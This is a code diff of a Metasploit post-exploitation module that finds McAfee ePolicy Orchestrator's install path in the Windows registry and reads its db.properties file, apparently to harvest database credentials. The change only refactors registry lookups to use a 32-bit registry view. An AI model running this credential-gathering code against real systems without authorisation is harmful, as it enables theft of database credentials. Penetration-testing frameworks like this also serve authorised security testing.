use REGISTRY_VIEW_32_BIT

modules/post/windows/gather/credentials/epo_sql.rb

@@ -31,37 +31,20 @@ class Metasploit3 < Msf::Post
   def run
     # Find out where things are installed
     print_status("Finding Tomcat install path...")
-  
-    # Check both normal and Wow6432Node keys
-    subkeys = 
-      [
-        'HKLM\\Software\\Network Associates\\ePolicy Orchestrator',
-        'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator'
-      ]
-
-    epol_reg_keys = []
-    subkeys.each do |subkey|
-      key = registry_enumkeys(subkey)
-      if not key.nil?
-        epol_reg_keys.push(subkey)
-      end
-    end
-
-    if (epol_reg_keys.nil? or epol_reg_keys.empty?)
+    subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT)
+    if subkeys.nil? or subkeys.empty?
       print_error ("ePO 4.6 Not Installed or No Permissions to RegKey")
       return
     end
-
     # Get the db.properties file location
-    epol_reg_keys.each do |epol_reg_key|
-      dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder")
-      if dbprops_file == nil or dbprops_file == ""
-        print_error("Could not find db.properties file location")
-      else
-        dbprops_file << "/conf/orion/db.properties";
-        print_good("Found db.properties location");
-        process_config(dbprops_file);
-      end
+    epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator"
+    dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT)
+    if dbprops_file == nil or dbprops_file == ""
+      print_error("Could not find db.properties file location")
+    else
+      dbprops_file << "/conf/orion/db.properties";
+      print_good("Found db.properties location");
+      process_config(dbprops_file);
     end
   end
 
@@ -191,4 +174,4 @@ class Metasploit3 < Msf::Post
   end
 
 
-end
+end